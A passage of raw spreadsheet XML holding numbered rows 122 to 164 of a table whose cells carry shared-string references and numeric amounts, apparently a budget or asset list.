      <c r="K122" s="99">
        <v>20160</v>
      </c>
      <c r="L122" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M122" s="225"/>
    </row>
    <row r="123" ht="14.25" customHeight="1" spans="2:13">
      <c r="B123" s="11">
        <v>115</v>
      </c>
      <c r="C123" s="237" t="s">
        <v>570</v>
      </c>
      <c r="D123" s="238" t="s">
        <v>571</v>
      </c>
      <c r="E123" s="11"/>
      <c r="F123" s="17"/>
      <c r="G123" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H123" s="11"/>
      <c r="I123" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J123" s="100">
        <v>170000</v>
      </c>
      <c r="K123" s="99">
        <v>38080</v>
      </c>
      <c r="L123" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M123" s="225"/>
    </row>
    <row r="124" ht="14.25" customHeight="1" spans="2:13">
      <c r="B124" s="16">
        <v>116</v>
      </c>
      <c r="C124" s="237" t="s">
        <v>572</v>
      </c>
      <c r="D124" s="238" t="s">
        <v>573</v>
      </c>
      <c r="E124" s="11"/>
      <c r="F124" s="17"/>
      <c r="G124" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H124" s="11"/>
      <c r="I124" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J124" s="100">
        <v>64000</v>
      </c>
      <c r="K124" s="99">
        <v>14336</v>
      </c>
      <c r="L124" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M124" s="225"/>
    </row>
    <row r="125" ht="14.25" customHeight="1" spans="2:13">
      <c r="B125" s="11">
        <v>117</v>
      </c>
      <c r="C125" s="237" t="s">
        <v>574</v>
      </c>
      <c r="D125" s="238" t="s">
        <v>575</v>
      </c>
      <c r="E125" s="11"/>
      <c r="F125" s="17"/>
      <c r="G125" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H125" s="11"/>
      <c r="I125" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J125" s="100">
        <v>58000</v>
      </c>
      <c r="K125" s="99">
        <v>12992</v>
      </c>
      <c r="L125" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M125" s="225"/>
    </row>
    <row r="126" ht="14.25" customHeight="1" spans="2:13">
      <c r="B126" s="16">
        <v>118</v>
      </c>
      <c r="C126" s="237" t="s">
        <v>576</v>
      </c>
      <c r="D126" s="238" t="s">
        <v>577</v>
      </c>
      <c r="E126" s="11"/>
      <c r="F126" s="17"/>
      <c r="G126" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H126" s="11">
        <v>1</v>
      </c>
      <c r="I126" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J126" s="100">
        <v>100000</v>
      </c>
      <c r="K126" s="99">
        <v>22400</v>
      </c>
      <c r="L126" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M126" s="225"/>
    </row>
    <row r="127" ht="14.25" customHeight="1" spans="2:13">
      <c r="B127" s="11">
        <v>119</v>
      </c>
      <c r="C127" s="237" t="s">
        <v>578</v>
      </c>
      <c r="D127" s="238" t="s">
        <v>579</v>
      </c>
      <c r="E127" s="11"/>
      <c r="F127" s="17"/>
      <c r="G127" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H127" s="11">
        <v>1</v>
      </c>
      <c r="I127" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J127" s="100">
        <v>80000</v>
      </c>
      <c r="K127" s="99">
        <v>17920</v>
      </c>
      <c r="L127" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M127" s="225"/>
    </row>
    <row r="128" ht="14.25" customHeight="1" spans="2:13">
      <c r="B128" s="16">
        <v>120</v>
      </c>
      <c r="C128" s="237" t="s">
        <v>580</v>
      </c>
      <c r="D128" s="238" t="s">
        <v>581</v>
      </c>
      <c r="E128" s="11"/>
      <c r="F128" s="17"/>
      <c r="G128" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H128" s="11">
        <v>150</v>
      </c>
      <c r="I128" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J128" s="100">
        <v>18750</v>
      </c>
      <c r="K128" s="99">
        <v>4200</v>
      </c>
      <c r="L128" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M128" s="225"/>
    </row>
    <row r="129" ht="14.25" customHeight="1" spans="2:13">
      <c r="B129" s="11">
        <v>121</v>
      </c>
      <c r="C129" s="237" t="s">
        <v>582</v>
      </c>
      <c r="D129" s="238" t="s">
        <v>525</v>
      </c>
      <c r="E129" s="237" t="s">
        <v>583</v>
      </c>
      <c r="F129" s="17"/>
      <c r="G129" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H129" s="11">
        <v>1</v>
      </c>
      <c r="I129" s="237" t="s">
        <v>584</v>
      </c>
      <c r="J129" s="100">
        <v>180000</v>
      </c>
      <c r="K129" s="99">
        <v>40320</v>
      </c>
      <c r="L129" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M129" s="225"/>
    </row>
    <row r="130" ht="14.25" customHeight="1" spans="2:13">
      <c r="B130" s="16">
        <v>122</v>
      </c>
      <c r="C130" s="237" t="s">
        <v>585</v>
      </c>
      <c r="D130" s="238" t="s">
        <v>586</v>
      </c>
      <c r="E130" s="237" t="s">
        <v>446</v>
      </c>
      <c r="F130" s="17"/>
      <c r="G130" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H130" s="11">
        <v>1</v>
      </c>
      <c r="I130" s="237" t="s">
        <v>587</v>
      </c>
      <c r="J130" s="100">
        <v>21300</v>
      </c>
      <c r="K130" s="99">
        <v>62720</v>
      </c>
      <c r="L130" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M130" s="225"/>
    </row>
    <row r="131" ht="14.25" customHeight="1" spans="1:13">
      <c r="A131" s="175"/>
      <c r="B131" s="11">
        <v>123</v>
      </c>
      <c r="C131" s="237" t="s">
        <v>588</v>
      </c>
      <c r="D131" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E131" s="237" t="s">
        <v>446</v>
      </c>
      <c r="F131" s="17"/>
      <c r="G131" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H131" s="11">
        <v>1</v>
      </c>
      <c r="I131" s="237" t="s">
        <v>587</v>
      </c>
      <c r="J131" s="100">
        <v>32000</v>
      </c>
      <c r="K131" s="99">
        <v>56000</v>
      </c>
      <c r="L131" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M131" s="225"/>
    </row>
    <row r="132" ht="14.25" customHeight="1" spans="2:13">
      <c r="B132" s="16">
        <v>124</v>
      </c>
      <c r="C132" s="237" t="s">
        <v>589</v>
      </c>
      <c r="D132" s="238" t="s">
        <v>590</v>
      </c>
      <c r="E132" s="237" t="s">
        <v>591</v>
      </c>
      <c r="F132" s="17"/>
      <c r="G132" s="16" t="s">
        <v>592</v>
      </c>
      <c r="H132" s="11"/>
      <c r="I132" s="237" t="s">
        <v>587</v>
      </c>
      <c r="J132" s="100">
        <v>156736</v>
      </c>
      <c r="K132" s="99">
        <v>26880</v>
      </c>
      <c r="L132" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M132" s="225"/>
    </row>
    <row r="133" ht="14.25" customHeight="1" spans="2:13">
      <c r="B133" s="11">
        <v>125</v>
      </c>
      <c r="C133" s="237" t="s">
        <v>593</v>
      </c>
      <c r="D133" s="238" t="s">
        <v>594</v>
      </c>
      <c r="E133" s="237" t="s">
        <v>595</v>
      </c>
      <c r="F133" s="17"/>
      <c r="G133" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H133" s="11">
        <v>2</v>
      </c>
      <c r="I133" s="237" t="s">
        <v>596</v>
      </c>
      <c r="J133" s="100">
        <v>18500</v>
      </c>
      <c r="K133" s="99">
        <v>8680</v>
      </c>
      <c r="L133" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M133" s="225"/>
    </row>
    <row r="134" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A134" s="176"/>
      <c r="B134" s="16">
        <v>126</v>
      </c>
      <c r="C134" s="237" t="s">
        <v>597</v>
      </c>
      <c r="D134" s="238" t="s">
        <v>598</v>
      </c>
      <c r="E134" s="237" t="s">
        <v>599</v>
      </c>
      <c r="F134" s="201"/>
      <c r="G134" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H134" s="11">
        <v>1</v>
      </c>
      <c r="I134" s="237" t="s">
        <v>600</v>
      </c>
      <c r="J134" s="100">
        <v>5500</v>
      </c>
      <c r="K134" s="99">
        <v>0</v>
      </c>
      <c r="L134" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M134" s="225"/>
    </row>
    <row r="135" ht="14.25" customHeight="1" spans="2:13">
      <c r="B135" s="11">
        <v>127</v>
      </c>
      <c r="C135" s="237" t="s">
        <v>601</v>
      </c>
      <c r="D135" s="238" t="s">
        <v>602</v>
      </c>
      <c r="E135" s="237" t="s">
        <v>603</v>
      </c>
      <c r="F135" s="17"/>
      <c r="G135" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H135" s="11">
        <v>1</v>
      </c>
      <c r="I135" s="237" t="s">
        <v>600</v>
      </c>
      <c r="J135" s="100">
        <v>5000</v>
      </c>
      <c r="K135" s="99">
        <v>1240</v>
      </c>
      <c r="L135" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M135" s="225"/>
    </row>
    <row r="136" ht="14.25" customHeight="1" spans="1:13">
      <c r="A136" s="175"/>
      <c r="B136" s="16">
        <v>128</v>
      </c>
      <c r="C136" s="237" t="s">
        <v>604</v>
      </c>
      <c r="D136" s="238" t="s">
        <v>605</v>
      </c>
      <c r="E136" s="237" t="s">
        <v>606</v>
      </c>
      <c r="F136" s="17"/>
      <c r="G136" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H136" s="11">
        <v>1</v>
      </c>
      <c r="I136" s="237" t="s">
        <v>600</v>
      </c>
      <c r="J136" s="100">
        <v>3000</v>
      </c>
      <c r="K136" s="99">
        <v>744</v>
      </c>
      <c r="L136" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M136" s="225"/>
    </row>
    <row r="137" ht="14.25" customHeight="1" spans="2:13">
      <c r="B137" s="11">
        <v>129</v>
      </c>
      <c r="C137" s="237" t="s">
        <v>607</v>
      </c>
      <c r="D137" s="238" t="s">
        <v>608</v>
      </c>
      <c r="E137" s="237" t="s">
        <v>609</v>
      </c>
      <c r="F137" s="17"/>
      <c r="G137" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H137" s="11">
        <v>1</v>
      </c>
      <c r="I137" s="237" t="s">
        <v>600</v>
      </c>
      <c r="J137" s="100">
        <v>131500</v>
      </c>
      <c r="K137" s="99">
        <v>32612</v>
      </c>
      <c r="L137" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M137" s="225"/>
    </row>
    <row r="138" ht="14.25" customHeight="1" spans="2:13">
      <c r="B138" s="16">
        <v>130</v>
      </c>
      <c r="C138" s="240" t="s">
        <v>610</v>
      </c>
      <c r="D138" s="241" t="s">
        <v>611</v>
      </c>
      <c r="E138" s="11"/>
      <c r="F138" s="17"/>
      <c r="G138" s="16"/>
      <c r="H138" s="11"/>
      <c r="I138" s="237" t="s">
        <v>612</v>
      </c>
      <c r="J138" s="100">
        <v>13302369.29</v>
      </c>
      <c r="K138" s="99">
        <v>104000</v>
      </c>
      <c r="L138" s="239" t="s">
        <v>523</v>
      </c>
      <c r="M138" s="225"/>
    </row>
    <row r="139" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A139" s="176"/>
      <c r="B139" s="11">
        <v>131</v>
      </c>
      <c r="C139" s="237" t="s">
        <v>613</v>
      </c>
      <c r="D139" s="238" t="s">
        <v>614</v>
      </c>
      <c r="E139" s="238" t="s">
        <v>615</v>
      </c>
      <c r="F139" s="14"/>
      <c r="G139" s="11" t="s">
        <v>466</v>
      </c>
      <c r="H139" s="11">
        <v>1</v>
      </c>
      <c r="I139" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J139" s="91">
        <v>86000</v>
      </c>
      <c r="K139" s="99">
        <v>16128</v>
      </c>
      <c r="L139" s="238" t="s">
        <v>616</v>
      </c>
      <c r="M139" s="225"/>
    </row>
    <row r="140" ht="14.25" customHeight="1" spans="2:13">
      <c r="B140" s="16">
        <v>132</v>
      </c>
      <c r="C140" s="237" t="s">
        <v>617</v>
      </c>
      <c r="D140" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E140" s="237" t="s">
        <v>618</v>
      </c>
      <c r="F140" s="17"/>
      <c r="G140" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H140" s="11">
        <v>2</v>
      </c>
      <c r="I140" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J140" s="100">
        <v>24976</v>
      </c>
      <c r="K140" s="99">
        <v>5594.624</v>
      </c>
      <c r="L140" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M140" s="225"/>
    </row>
    <row r="141" ht="14.25" customHeight="1" spans="2:13">
      <c r="B141" s="11">
        <v>133</v>
      </c>
      <c r="C141" s="237" t="s">
        <v>619</v>
      </c>
      <c r="D141" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E141" s="237" t="s">
        <v>620</v>
      </c>
      <c r="F141" s="17"/>
      <c r="G141" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H141" s="11">
        <v>2</v>
      </c>
      <c r="I141" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J141" s="100">
        <v>24024</v>
      </c>
      <c r="K141" s="99">
        <v>5376</v>
      </c>
      <c r="L141" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M141" s="225"/>
    </row>
    <row r="142" ht="14.25" customHeight="1" spans="2:13">
      <c r="B142" s="16">
        <v>134</v>
      </c>
      <c r="C142" s="237" t="s">
        <v>621</v>
      </c>
      <c r="D142" s="238" t="s">
        <v>622</v>
      </c>
      <c r="E142" s="237" t="s">
        <v>623</v>
      </c>
      <c r="F142" s="17"/>
      <c r="G142" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H142" s="11">
        <v>1</v>
      </c>
      <c r="I142" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J142" s="100">
        <v>419000</v>
      </c>
      <c r="K142" s="99">
        <v>85120</v>
      </c>
      <c r="L142" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M142" s="225"/>
    </row>
    <row r="143" ht="14.25" customHeight="1" spans="2:13">
      <c r="B143" s="11">
        <v>135</v>
      </c>
      <c r="C143" s="237" t="s">
        <v>624</v>
      </c>
      <c r="D143" s="238" t="s">
        <v>625</v>
      </c>
      <c r="E143" s="237" t="s">
        <v>626</v>
      </c>
      <c r="F143" s="17"/>
      <c r="G143" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H143" s="11">
        <v>1</v>
      </c>
      <c r="I143" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J143" s="100">
        <v>183350</v>
      </c>
      <c r="K143" s="99">
        <v>35840</v>
      </c>
      <c r="L143" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M143" s="225"/>
    </row>
    <row r="144" ht="14.25" customHeight="1" spans="2:13">
      <c r="B144" s="16">
        <v>136</v>
      </c>
      <c r="C144" s="237" t="s">
        <v>627</v>
      </c>
      <c r="D144" s="238" t="s">
        <v>381</v>
      </c>
      <c r="E144" s="237" t="s">
        <v>628</v>
      </c>
      <c r="F144" s="17"/>
      <c r="G144" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H144" s="11">
        <v>1</v>
      </c>
      <c r="I144" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J144" s="100">
        <v>71250</v>
      </c>
      <c r="K144" s="99">
        <v>15232</v>
      </c>
      <c r="L144" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M144" s="225"/>
    </row>
    <row r="145" ht="14.25" customHeight="1" spans="2:13">
      <c r="B145" s="11">
        <v>137</v>
      </c>
      <c r="C145" s="237" t="s">
        <v>629</v>
      </c>
      <c r="D145" s="238" t="s">
        <v>491</v>
      </c>
      <c r="E145" s="237" t="s">
        <v>630</v>
      </c>
      <c r="F145" s="17"/>
      <c r="G145" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H145" s="11">
        <v>2</v>
      </c>
      <c r="I145" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J145" s="100">
        <v>120000</v>
      </c>
      <c r="K145" s="99">
        <v>26880</v>
      </c>
      <c r="L145" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M145" s="225"/>
    </row>
    <row r="146" ht="14.25" customHeight="1" spans="2:13">
      <c r="B146" s="16">
        <v>138</v>
      </c>
      <c r="C146" s="237" t="s">
        <v>631</v>
      </c>
      <c r="D146" s="238" t="s">
        <v>632</v>
      </c>
      <c r="E146" s="237" t="s">
        <v>633</v>
      </c>
      <c r="F146" s="17"/>
      <c r="G146" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H146" s="11">
        <v>1</v>
      </c>
      <c r="I146" s="237" t="s">
        <v>634</v>
      </c>
      <c r="J146" s="100">
        <v>5600</v>
      </c>
      <c r="K146" s="99">
        <v>4464</v>
      </c>
      <c r="L146" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M146" s="225"/>
    </row>
    <row r="147" ht="14.25" customHeight="1" spans="2:13">
      <c r="B147" s="11">
        <v>139</v>
      </c>
      <c r="C147" s="237" t="s">
        <v>635</v>
      </c>
      <c r="D147" s="238" t="s">
        <v>427</v>
      </c>
      <c r="E147" s="237" t="s">
        <v>636</v>
      </c>
      <c r="F147" s="17"/>
      <c r="G147" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H147" s="11">
        <v>1</v>
      </c>
      <c r="I147" s="237" t="s">
        <v>637</v>
      </c>
      <c r="J147" s="100">
        <v>518500</v>
      </c>
      <c r="K147" s="99">
        <v>128464</v>
      </c>
      <c r="L147" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M147" s="225"/>
    </row>
    <row r="148" ht="14.25" customHeight="1" spans="2:13">
      <c r="B148" s="16">
        <v>140</v>
      </c>
      <c r="C148" s="237" t="s">
        <v>638</v>
      </c>
      <c r="D148" s="238" t="s">
        <v>639</v>
      </c>
      <c r="E148" s="237" t="s">
        <v>640</v>
      </c>
      <c r="F148" s="17"/>
      <c r="G148" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H148" s="11">
        <v>1</v>
      </c>
      <c r="I148" s="237" t="s">
        <v>637</v>
      </c>
      <c r="J148" s="100">
        <v>587500</v>
      </c>
      <c r="K148" s="99">
        <v>138880</v>
      </c>
      <c r="L148" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M148" s="225"/>
    </row>
    <row r="149" ht="14.25" customHeight="1" spans="2:13">
      <c r="B149" s="11">
        <v>141</v>
      </c>
      <c r="C149" s="237" t="s">
        <v>641</v>
      </c>
      <c r="D149" s="238" t="s">
        <v>642</v>
      </c>
      <c r="E149" s="237" t="s">
        <v>643</v>
      </c>
      <c r="F149" s="17"/>
      <c r="G149" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H149" s="11">
        <v>1</v>
      </c>
      <c r="I149" s="237" t="s">
        <v>644</v>
      </c>
      <c r="J149" s="100">
        <v>792591.59</v>
      </c>
      <c r="K149" s="99">
        <v>196562.568</v>
      </c>
      <c r="L149" s="239" t="s">
        <v>616</v>
      </c>
      <c r="M149" s="225"/>
    </row>
    <row r="150" ht="14.25" customHeight="1" spans="2:13">
      <c r="B150" s="16">
        <v>142</v>
      </c>
      <c r="C150" s="237" t="s">
        <v>645</v>
      </c>
      <c r="D150" s="238" t="s">
        <v>646</v>
      </c>
      <c r="E150" s="11"/>
      <c r="F150" s="17"/>
      <c r="G150" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H150" s="11">
        <v>1</v>
      </c>
      <c r="I150" s="237" t="s">
        <v>647</v>
      </c>
      <c r="J150" s="100">
        <v>3841064.55</v>
      </c>
      <c r="K150" s="99">
        <v>94240</v>
      </c>
      <c r="L150" s="239" t="s">
        <v>648</v>
      </c>
      <c r="M150" s="225"/>
    </row>
    <row r="151" ht="14.25" customHeight="1" spans="2:13">
      <c r="B151" s="11">
        <v>143</v>
      </c>
      <c r="C151" s="237" t="s">
        <v>649</v>
      </c>
      <c r="D151" s="238" t="s">
        <v>427</v>
      </c>
      <c r="E151" s="237" t="s">
        <v>636</v>
      </c>
      <c r="F151" s="17"/>
      <c r="G151" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H151" s="11">
        <v>2</v>
      </c>
      <c r="I151" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J151" s="100">
        <v>1222000</v>
      </c>
      <c r="K151" s="99">
        <v>232064</v>
      </c>
      <c r="L151" s="239" t="s">
        <v>650</v>
      </c>
      <c r="M151" s="225"/>
    </row>
    <row r="152" ht="14.25" customHeight="1" spans="2:13">
      <c r="B152" s="16">
        <v>144</v>
      </c>
      <c r="C152" s="237" t="s">
        <v>651</v>
      </c>
      <c r="D152" s="238" t="s">
        <v>425</v>
      </c>
      <c r="E152" s="237" t="s">
        <v>640</v>
      </c>
      <c r="F152" s="17"/>
      <c r="G152" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H152" s="11">
        <v>2</v>
      </c>
      <c r="I152" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J152" s="100">
        <v>1430000</v>
      </c>
      <c r="K152" s="99">
        <v>250880</v>
      </c>
      <c r="L152" s="239" t="s">
        <v>650</v>
      </c>
      <c r="M152" s="225"/>
    </row>
    <row r="153" ht="14.25" customHeight="1" spans="2:13">
      <c r="B153" s="11">
        <v>145</v>
      </c>
      <c r="C153" s="237" t="s">
        <v>652</v>
      </c>
      <c r="D153" s="238" t="s">
        <v>328</v>
      </c>
      <c r="E153" s="237" t="s">
        <v>630</v>
      </c>
      <c r="F153" s="17"/>
      <c r="G153" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H153" s="11">
        <v>2</v>
      </c>
      <c r="I153" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J153" s="100">
        <v>160000</v>
      </c>
      <c r="K153" s="99">
        <v>30240</v>
      </c>
      <c r="L153" s="239" t="s">
        <v>650</v>
      </c>
      <c r="M153" s="225"/>
    </row>
    <row r="154" ht="14.25" customHeight="1" spans="2:13">
      <c r="B154" s="16">
        <v>146</v>
      </c>
      <c r="C154" s="237" t="s">
        <v>653</v>
      </c>
      <c r="D154" s="238" t="s">
        <v>654</v>
      </c>
      <c r="E154" s="237" t="s">
        <v>633</v>
      </c>
      <c r="F154" s="17"/>
      <c r="G154" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H154" s="11">
        <v>1</v>
      </c>
      <c r="I154" s="237" t="s">
        <v>467</v>
      </c>
      <c r="J154" s="100">
        <v>80000</v>
      </c>
      <c r="K154" s="99">
        <v>4480</v>
      </c>
      <c r="L154" s="239" t="s">
        <v>650</v>
      </c>
      <c r="M154" s="225"/>
    </row>
    <row r="155" ht="14.25" customHeight="1" spans="2:13">
      <c r="B155" s="11">
        <v>147</v>
      </c>
      <c r="C155" s="237" t="s">
        <v>655</v>
      </c>
      <c r="D155" s="238" t="s">
        <v>656</v>
      </c>
      <c r="E155" s="237" t="s">
        <v>269</v>
      </c>
      <c r="F155" s="17"/>
      <c r="G155" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H155" s="11">
        <v>2</v>
      </c>
      <c r="I155" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J155" s="100">
        <v>24000</v>
      </c>
      <c r="K155" s="99">
        <v>5376</v>
      </c>
      <c r="L155" s="239" t="s">
        <v>650</v>
      </c>
      <c r="M155" s="225"/>
    </row>
    <row r="156" ht="14.25" customHeight="1" spans="2:13">
      <c r="B156" s="16">
        <v>148</v>
      </c>
      <c r="C156" s="237" t="s">
        <v>658</v>
      </c>
      <c r="D156" s="238" t="s">
        <v>500</v>
      </c>
      <c r="E156" s="237" t="s">
        <v>659</v>
      </c>
      <c r="F156" s="17"/>
      <c r="G156" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H156" s="11">
        <v>1</v>
      </c>
      <c r="I156" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J156" s="100">
        <v>520000</v>
      </c>
      <c r="K156" s="99">
        <v>116480</v>
      </c>
      <c r="L156" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M156" s="225"/>
    </row>
    <row r="157" ht="14.25" customHeight="1" spans="2:13">
      <c r="B157" s="11">
        <v>149</v>
      </c>
      <c r="C157" s="237" t="s">
        <v>661</v>
      </c>
      <c r="D157" s="238" t="s">
        <v>662</v>
      </c>
      <c r="E157" s="237" t="s">
        <v>663</v>
      </c>
      <c r="F157" s="17"/>
      <c r="G157" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H157" s="11">
        <v>1</v>
      </c>
      <c r="I157" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J157" s="100">
        <v>131300</v>
      </c>
      <c r="K157" s="99">
        <v>29344</v>
      </c>
      <c r="L157" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M157" s="225"/>
    </row>
    <row r="158" ht="14.25" customHeight="1" spans="2:13">
      <c r="B158" s="16">
        <v>150</v>
      </c>
      <c r="C158" s="237" t="s">
        <v>664</v>
      </c>
      <c r="D158" s="238" t="s">
        <v>665</v>
      </c>
      <c r="E158" s="237" t="s">
        <v>666</v>
      </c>
      <c r="F158" s="17"/>
      <c r="G158" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H158" s="11">
        <v>1</v>
      </c>
      <c r="I158" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J158" s="100">
        <v>7500</v>
      </c>
      <c r="K158" s="99">
        <v>896</v>
      </c>
      <c r="L158" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M158" s="225"/>
    </row>
    <row r="159" ht="14.25" customHeight="1" spans="2:13">
      <c r="B159" s="11">
        <v>151</v>
      </c>
      <c r="C159" s="237" t="s">
        <v>667</v>
      </c>
      <c r="D159" s="238" t="s">
        <v>665</v>
      </c>
      <c r="E159" s="237" t="s">
        <v>668</v>
      </c>
      <c r="F159" s="17"/>
      <c r="G159" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H159" s="11">
        <v>3</v>
      </c>
      <c r="I159" s="237" t="s">
        <v>657</v>
      </c>
      <c r="J159" s="100">
        <v>15000</v>
      </c>
      <c r="K159" s="99">
        <v>2688</v>
      </c>
      <c r="L159" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M159" s="225"/>
    </row>
    <row r="160" ht="14.25" customHeight="1" spans="2:13">
      <c r="B160" s="16">
        <v>152</v>
      </c>
      <c r="C160" s="237" t="s">
        <v>669</v>
      </c>
      <c r="D160" s="238" t="s">
        <v>670</v>
      </c>
      <c r="E160" s="237" t="s">
        <v>671</v>
      </c>
      <c r="F160" s="17"/>
      <c r="G160" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H160" s="11">
        <v>1</v>
      </c>
      <c r="I160" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J160" s="100">
        <v>700000</v>
      </c>
      <c r="K160" s="99">
        <v>152320</v>
      </c>
      <c r="L160" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M160" s="225"/>
    </row>
    <row r="161" ht="14.25" customHeight="1" spans="1:13">
      <c r="A161" s="175"/>
      <c r="B161" s="11">
        <v>153</v>
      </c>
      <c r="C161" s="237" t="s">
        <v>673</v>
      </c>
      <c r="D161" s="238" t="s">
        <v>674</v>
      </c>
      <c r="E161" s="237" t="s">
        <v>555</v>
      </c>
      <c r="F161" s="17"/>
      <c r="G161" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H161" s="11">
        <v>1</v>
      </c>
      <c r="I161" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J161" s="100">
        <v>335000</v>
      </c>
      <c r="K161" s="99">
        <v>71680</v>
      </c>
      <c r="L161" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M161" s="225"/>
    </row>
    <row r="162" ht="14.25" customHeight="1" spans="2:13">
      <c r="B162" s="16">
        <v>154</v>
      </c>
      <c r="C162" s="237" t="s">
        <v>675</v>
      </c>
      <c r="D162" s="238" t="s">
        <v>345</v>
      </c>
      <c r="E162" s="237" t="s">
        <v>676</v>
      </c>
      <c r="F162" s="17"/>
      <c r="G162" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H162" s="11">
        <v>1</v>
      </c>
      <c r="I162" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J162" s="100">
        <v>365000</v>
      </c>
      <c r="K162" s="99">
        <v>71680</v>
      </c>
      <c r="L162" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M162" s="225"/>
    </row>
    <row r="163" ht="14.25" customHeight="1" spans="2:13">
      <c r="B163" s="11">
        <v>155</v>
      </c>
      <c r="C163" s="237" t="s">
        <v>677</v>
      </c>
      <c r="D163" s="238" t="s">
        <v>678</v>
      </c>
      <c r="E163" s="237" t="s">
        <v>679</v>
      </c>
      <c r="F163" s="17"/>
      <c r="G163" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H163" s="11">
        <v>1</v>
      </c>
      <c r="I163" s="237" t="s">
        <v>672</v>
      </c>
      <c r="J163" s="100">
        <v>300000</v>
      </c>
      <c r="K163" s="99">
        <v>67200</v>
      </c>
      <c r="L163" s="239" t="s">
        <v>660</v>
      </c>
      <c r="M163" s="225"/>
    </row>
    <row r="164" s="175" customFormat="1" ht="14.25" customHeight="1" spans="1:13">
      <c r="A164" s="176"/>
      <c r="B164" s="16">
        <v>156</v>
      </c>
      <c r="C164" s="237" t="s">
        <v>680</v>
      </c>
      <c r="D164" s="238" t="s">
        <v>681</v>
      </c>
      <c r="E164" s="237" t="s">
        <v>682</v>
      </c>
      <c r="F164" s="201"/>
      <c r="G164" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H164" s="11">
        <v>7</v>
      </c>
